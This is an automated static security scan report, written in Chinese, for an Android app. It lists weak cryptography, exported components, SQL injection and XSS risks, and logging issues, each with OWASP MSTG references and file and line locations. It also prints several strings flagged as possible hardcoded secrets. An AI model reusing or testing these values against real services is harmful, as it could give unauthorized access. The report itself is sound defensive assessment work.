移动应用安全检测报告:
安全基线评分
安全基线评分 56/100
综合风险等级
风险等级评定
- A
- B
- C
- F
漏洞与安全项分布(%)
隐私风险
0
检测到的第三方跟踪器数量
检测结果分布
高危安全漏洞
2
中危安全漏洞
11
安全提示信息
2
已通过安全项
3
重点安全关注
0
高危安全漏洞 应用程序使用带PKCS5/PKCS7填充的加密模式CBC。此配置容易受到填充oracle攻击。
应用程序使用带PKCS5/PKCS7填充的加密模式CBC。此配置容易受到填充oracle攻击。 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: V1/AbstractC0757a.java, line(s) 41
高危安全漏洞 如果一个应用程序使用WebView.loadDataWithBaseURL方法来加载一个网页到WebView,那么这个应用程序可能会遭受跨站脚本攻击
如果一个应用程序使用WebView.loadDataWithBaseURL方法来加载一个网页到WebView,那么这个应用程序可能会遭受跨站脚本攻击 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#static-analysis-7 Files: com/nybnzdbqnih/ozvfwcjsbv/Uobxrpadwd.java, line(s) 330,7
中危安全漏洞 Activity (com.byd.maxlite.MainActivity) 未被保护。
[android:exported=true] 发现 Activity与设备上的其他应用程序共享,因此可被设备上的任何其他应用程序访问。
中危安全漏洞 Broadcast Receiver (com.aofytsolviwsm.usorofsjzcx.Owasoauiwaktv) 未被保护。
[android:exported=true] 发现 Broadcast Receiver与设备上的其他应用程序共享,因此可被设备上的任何其他应用程序访问。
中危安全漏洞 Service (com.aofytsolviwsm.icvejujjoiaxle.Sqtlkonqwnlsh) 受权限保护, 但是应该检查权限的保护级别。
Permission: android.permission.BIND_JOB_SERVICE [android:exported=true] 发现一个 Service被共享给了设备上的其他应用程序,因此让它可以被设备上的任何其他应用程序访问。它受到一个在分析的应用程序中没有定义的权限的保护。因此,应该在定义它的地方检查权限的保护级别。如果它被设置为普通或危险,一个恶意应用程序可以请求并获得这个权限,并与该组件交互。如果它被设置为签名,只有使用相同证书签名的应用程序才能获得这个权限。
中危安全漏洞 Activity (com.byd.maxlite.FunIn) 未被保护。
[android:exported=true] 发现 Activity与设备上的其他应用程序共享,因此可被设备上的任何其他应用程序访问。
中危安全漏洞 文件可能包含硬编码的敏感信息,如用户名、密码、密钥等
文件可能包含硬编码的敏感信息,如用户名、密码、密钥等 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#checking-memory-for-sensitive-data-mstg-storage-10 Files: A1/C0235B.java, line(s) 101 A1/C0242e.java, line(s) 39 A1/s.java, line(s) 90 Y0/h.java, line(s) 43
中危安全漏洞 SHA-1是已知存在哈希冲突的弱哈希
SHA-1是已知存在哈希冲突的弱哈希 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: P1/k.java, line(s) 255 l4/c.java, line(s) 67,69,72,75 m3/c.java, line(s) 61 n3/c.java, line(s) 284
中危安全漏洞 应用程序使用SQLite数据库并执行原始SQL查询。原始SQL查询中不受信任的用户输入可能会导致SQL注入。敏感信息也应加密并写入数据库
应用程序使用SQLite数据库并执行原始SQL查询。原始SQL查询中不受信任的用户输入可能会导致SQL注入。敏感信息也应加密并写入数据库 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04h-Testing-Code-Quality.md#injection-flaws-mstg-arch-2-and-mstg-platform-2 Files: F1/d.java, line(s) 8,68 F1/g.java, line(s) 13,53,67 F1/k.java, line(s) 4,37 F1/l.java, line(s) 6,134,184 F2/B1.java, line(s) 16,17,364,1977,2438,4295 F2/C0.java, line(s) 6,7,79 F2/C0052i.java, line(s) 5,6,82,137,178,1142,2056,2354 F2/H.java, line(s) 5,6,7,8,91 F2/L1.java, line(s) 5,235 F2/t1.java, line(s) 6,152 G1/k.java, line(s) 3,13,14,15,16,19,20,25,26,27,28,31,32,35 G1/l.java, line(s) 4,5,46 J0/h.java, line(s) 5,23,40,41,53,54 a3/c.java, line(s) 4,41 a3/m.java, line(s) 7,55 e1/b.java, line(s) 13,262 v0/b.java, line(s) 5,6,7,32
中危安全漏洞 应用程序使用不安全的随机数生成器
应用程序使用不安全的随机数生成器 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#weak-random-number-generators Files: F2/F1.java, line(s) 42 Q1/C0156p.java, line(s) 3 X4/C0778a.java, line(s) 3 a3/a.java, line(s) 16 l4/c.java, line(s) 13 p0/h.java, line(s) 122 w4/a.java, line(s) 3 w4/b.java, line(s) 3
中危安全漏洞 MD5是已知存在哈希冲突的弱哈希
MD5是已知存在哈希冲突的弱哈希 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: F2/F1.java, line(s) 108 V1/AbstractC0757a.java, line(s) 32
中危安全漏洞 应用程序可以读取/写入外部存储器,任何应用程序都可以读取写入外部存储器的数据
应用程序可以读取/写入外部存储器,任何应用程序都可以读取写入外部存储器的数据 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#external-storage Files: com/nybnzdbqnih/ozvfwcjsbv/Eqabmbolsgp.java, line(s) 77 com/nybnzdbqnih/ozvfwcjsbv/Pjnwyoaora.java, line(s) 120 com/nybnzdbqnih/ozvfwcjsbv/Uobxrpadwd.java, line(s) 306
中危安全漏洞 此应用可能包含硬编码机密信息
从应用程序中识别出以下机密确保这些不是机密或私人信息 "pugpawxaapi" : "hstdhuzhxjfiepqfbidlierelr" 49f946663a8deb7054212b8adda248c6 357a2fa0-eb1a-4af3-9bf1-4ec71f8d20ab B3EEABB8EE11C2BE770B684D95219ECB c103703e120ae8cc73c9248622f3cd1e
安全提示信息 应用程序记录日志信息,不得记录敏感信息
应用程序记录日志信息,不得记录敏感信息 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#logs Files: A/f.java, line(s) 31,32 A1/C0237D.java, line(s) 68,115,67,105,114,106 A1/i.java, line(s) 521,146,184,520,298 A1/j.java, line(s) 138,139 A1/l.java, line(s) 22,43 A1/u.java, line(s) 90 C/C0001b.java, line(s) 54 C/RunnableC0000a.java, line(s) 209 C/d.java, line(s) 39,91,103,130 C0/AbstractC0280d.java, line(s) 22,21 D3/C0304d.java, line(s) 96,130 E/b.java, line(s) 54 E/d.java, line(s) 173,177 E/p.java, line(s) 50,74,78 E3/AbstractC0322a.java, line(s) 33 E4/r.java, line(s) 35,96,97 F/f.java, line(s) 40,45 F/g.java, line(s) 41 F/h.java, line(s) 58 F/i.java, line(s) 45 F/j.java, line(s) 57,115 F1/d.java, line(s) 99,98 F1/g.java, line(s) 116,172 F1/l.java, line(s) 303,373,374,487,488,304 F2/B1.java, line(s) 2217,2228,2216 F2/C0055j.java, line(s) 545,1228,441,467,544,569,599,635,677,725,779,850,915,1011,1105,1219,1342,1454,1580,236,261,282,316,352,366,374,382,392,402,421,447,534,538,540,789,1224 F2/I0.java, line(s) 54,48,163,51,66,70 F2/J1.java, line(s) 36,97,35,96 F2/M.java, line(s) 255 F2/Q0.java, line(s) 102,107,110 F2/T0.java, line(s) 51,70,50,69,38,67 F2/W.java, line(s) 113,144,156,165,114,157,145,166 G0/c.java, line(s) 54,77,84,110,136 G1/C0354b.java, line(s) 70,71 G3/C0365g.java, line(s) 232 H2/a.java, line(s) 114,119 I0/AbstractC0386a.java, line(s) 89,98,103,111,90,99,104,112 I0/g.java, line(s) 56,67,74,79,93,103,145,150,159,165,171,180,187 I0/o.java, line(s) 72,74,82,84,92,94,102,104 I2/a.java, line(s) 116,210,283,286,131,139,227 I3/AbstractC0397h.java, line(s) 234 I3/RunnableC0392c.java, line(s) 43 I3/k.java, line(s) 58,57,65 J0/C0418d.java, line(s) 32 J2/C0421b.java, line(s) 85,100,84,99,123 J2/C0423d.java, line(s) 46,45 J2/C0425f.java, line(s) 15,12 J2/C0430k.java, line(s) 48,55,47,54 J2/C0431l.java, line(s) 78,77 J2/HandlerC0424e.java, line(s) 61,119,60,103,113,57,83,125 J2/RunnableC0428i.java, line(s) 53,52 J2/ServiceConnectionC0429j.java, line(s) 55,54,68,93,124,145,154,69,94,125,146,155 K/MenuC0450k.java, line(s) 514 K/ViewOnKeyListenerC0444e.java, line(s) 441 K/a.java, line(s) 166 K/c.java, line(s) 90 K2/e.java, line(s) 57,96,103 K2/f.java, line(s) 93,33,106,153,161,177,193 K2/h.java, line(s) 37 K2/i.java, line(s) 445,447,336,382,386,442,85,104 K2/k.java, line(s) 30 K2/n.java, line(s) 59 K2/q.java, line(s) 100,104,55 K3/x.java, line(s) 254,263,298,304 L1/C0523b.java, line(s) 50,112,129,135,140,58,113,130,136,141 L1/j.java, line(s) 50,51 L3/d.java, line(s) 145,333 N/C0094b.java, line(s) 81 N/C0107m.java, line(s) 31,44,92,155,198,215,239 N/F.java, line(s) 75 N/S.java, line(s) 221,191,220 N/W.java, line(s) 20,31 N/l0.java, line(s) 31 N/m0.java, line(s) 32,44,51,60 N/q0.java, line(s) 77,93,68 N4/B.java, line(s) 66,45,87 O1/b.java, line(s) 97,143,244 O1/c.java, line(s) 48,64,74,84 O4/d.java, line(s) 227 P1/C0636g.java, line(s) 484,28,230,242 P1/k.java, line(s) 269,281,263 P4/d.java, line(s) 42 Q0/C0644c.java, line(s) 81,178 Q0/e.java, line(s) 32,45 Q0/f.java, line(s) 64 Q1/C0152n.java, line(s) 313 Q1/C0649d.java, line(s) 40,41 R2/AbstractC0658b.java, line(s) 184,50,183,177 R2/AbstractC0660d.java, line(s) 49,56 R3/B.java, line(s) 22,21 R3/D.java, line(s) 46,50,58,73,92,122,148,100,105,130,45,49,57,72,89,121,147 R3/e.java, line(s) 24,27 R3/h.java, line(s) 63,62 R3/k.java, line(s) 34,95,130,139,116,121,142,148,151,33,94,129 R3/n.java, line(s) 52,26,29,41,51,42 R3/s.java, line(s) 246,256,245,255 R3/t.java, line(s) 33,49 R3/u.java, line(s) 24 R3/x.java, line(s) 112,122,159,196,191,108,118,155,195 R3/y.java, line(s) 23,38,22,37 R3/z.java, line(s) 56,106,55,123,136,155,162 S0/f.java, line(s) 417,253,428,124,416,553,273,314,327,361,401,409,425 T/C0692c.java, line(s) 42,43 T/C0693d.java, line(s) 400 T/r.java, line(s) 18,17 T1/G.java, line(s) 12,20,22,31 U1/h.java, line(s) 24,32,34,43,50,58,60,69,76,84,86,131,96,104,106,115 V/d.java, line(s) 305 V/e.java, line(s) 1049,1083,1111,1140 W0/c.java, line(s) 85 X0/c.java, line(s) 56,79,53,78 X0/d.java, line(s) 132,149,154,131,148,153,173 X2/e.java, line(s) 134,159,175,183,392,218,219 Z0/b.java, line(s) 107,121,106,120 Z0/o.java, line(s) 456 Z3/d.java, line(s) 68 a0/C0231b.java, line(s) 128 a0/C0232c.java, line(s) 196,204,247,259,271,283,295,307,319,331,338,349,361,344 a0/g.java, line(s) 350,458,464,532,607,623,643,650,816,1022,1072,1092,1106,1140,1158,1218,1257,1260,1299,1320,1343,1352,1383,1398,1411,1419,1468,1494,1506,1523,1551,1635,1652,1667,1702,1793,58,367,518,984,1646,1723,1737 a3/C0257i.java, line(s) 35 b1/f.java, line(s) 67,135,68,136 b1/g.java, line(s) 97,201,217,229,93,109,115,144,150,157,184,196,203,216,228,77,113,148,165,185 com/lodhi/apps/boldtextgenerator/MainActivity.java, line(s) 243,242,145,327 d/f.java, line(s) 111 d1/b.java, line(s) 57,83,94 d1/d.java, line(s) 15,14 e1/C0310A.java, line(s) 97,96 e1/C0316b.java, line(s) 68,87,92,108,113,69,88,95,119 e1/C0318d.java, line(s) 55,54 e1/C0319e.java, line(s) 260,332,369,330,368 e1/b.java, line(s) 58,315,57,311 g/AbstractC0350k.java, line(s) 614,387,396 g/LayoutInflaterFactory2C0333B.java, line(s) 1097,1749,1751,1754,957,966,976,985,992,1004,1013,697,777,780,1240,1253,1593 g/c.java, line(s) 30,33,36,84,165,176 g/q.java, line(s) 42 g/s.java, line(s) 186,194 h1/C0377b.java, line(s) 56,55,65,91,92 h1/C0378c.java, line(s) 43,44 h1/D.java, line(s) 99,120,150,98,119,149 h1/i.java, line(s) 22,27,23,30 h1/m.java, line(s) 24,31,126,136,150,161,184,192,216,242,248,23,30,125,135,147,160,183,191,211,222,232,237,241,244 h1/p.java, line(s) 94,440,727,93,390,439,465,534,639,656,677,698,710,726,748,760,422,481,562 h1/r.java, line(s) 28,58,33,63 h1/v.java, line(s) 72,78,84,90,96,103,109,124,136,73,79,85,91,97,104,110,137,125 h1/y.java, line(s) 43,52,59,44,53,60,61,62,65 h4/b.java, line(s) 518 j/C0408h.java, line(s) 92,142,154,164 j/C0409i.java, line(s) 164 j/m.java, line(s) 22 l/AbstractC0472d0.java, line(s) 20 l/C0480h0.java, line(s) 87,96,189 l/C0491n.java, line(s) 102,147,145,157,158 l/C0506v.java, line(s) 62 l/C0510x.java, line(s) 191 l/D0.java, line(s) 226,80,85,209 l/I0.java, line(s) 23 l/L.java, line(s) 60,65,70,75 l/P0.java, line(s) 34 l/S.java, line(s) 74 l/d1.java, line(s) 112 l2/b.java, line(s) 35 m2/l.java, line(s) 295 m3/c.java, line(s) 54,65 n0/d.java, line(s) 762,770 n2/AbstractC0562e.java, line(s) 317,207,213,219,228,345 n2/BinderC0557C.java, line(s) 39 n2/C0564g.java, line(s) 77 n2/E.java, line(s) 45 n2/H.java, line(s) 40,45 n2/HandlerC0556B.java, line(s) 106,114 n2/J.java, line(s) 47 n2/o.java, line(s) 82,85,114,117,120,158,163 n2/r.java, line(s) 16 n3/c.java, line(s) 274,295,92,93,233,255 n3/g.java, line(s) 54,53 n3/i.java, line(s) 111,45,110,46 o3/l.java, line(s) 43,42 p0/AbstractC0603G.java, line(s) 759 p0/C0624u.java, line(s) 138,108 p0/Q.java, line(s) 47 p0/RunnableC0607c.java, line(s) 42,48 p0/W.java, line(s) 174 p0/h.java, line(s) 689,699,690,700 q2/C0651b.java, line(s) 74,93 q2/e.java, line(s) 116,104,133 t2/AbstractC0714b.java, line(s) 178 t3/c.java, line(s) 746,739,745,131,137,143,564,577,618,637 u3/b.java, line(s) 304 u3/d.java, line(s) 21 u3/f.java, line(s) 420,438,82,91,121,161,193,228,260,292,349 v0/c.java, line(s) 27 v0/d.java, line(s) 169 v2/d.java, line(s) 76,82,526,109,119,141,177,219,521,165,79,168,192,195,214,271,331,367,381,389,398,492 v2/e.java, line(s) 355,379 v4/a.java, line(s) 330 y/c.java, line(s) 65,104,113 y/g.java, line(s) 51 y/j.java, line(s) 369,438 y/n.java, line(s) 724,1296,1785,1791,1792,1793,1800,1830,1842,1891,342,864,1391,1403,1716
安全提示信息 此应用程序将数据复制到剪贴板。敏感数据不应复制到剪贴板,因为其他应用程序可以访问它
此应用程序将数据复制到剪贴板。敏感数据不应复制到剪贴板,因为其他应用程序可以访问它 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04b-Mobile-App-Security-Testing.md#clipboard Files: com/lodhi/apps/boldtextgenerator/d.java, line(s) 4,33,44
已通过安全项 此应用程序使用SSL Pinning 来检测或防止安全通信通道中的MITM攻击
此应用程序使用SSL Pinning 来检测或防止安全通信通道中的MITM攻击 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4 Files: O4/e.java, line(s) 52,51,50 O4/h.java, line(s) 85,75,84,94,83,83 O4/m.java, line(s) 52,51,50,50 O4/n.java, line(s) 101,89,100,99,99
已通过安全项 此应用程序可能具有Root检测功能
此应用程序可能具有Root检测功能 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05j-Testing-Resiliency-Against-Reverse-Engineering.md#testing-root-detection-mstg-resilience-1 Files: n3/i.java, line(s) 62
已通过安全项 此应用程序没有隐私跟踪程序
此应用程序不包括任何用户或设备跟踪器。在静态分析期间没有找到任何跟踪器。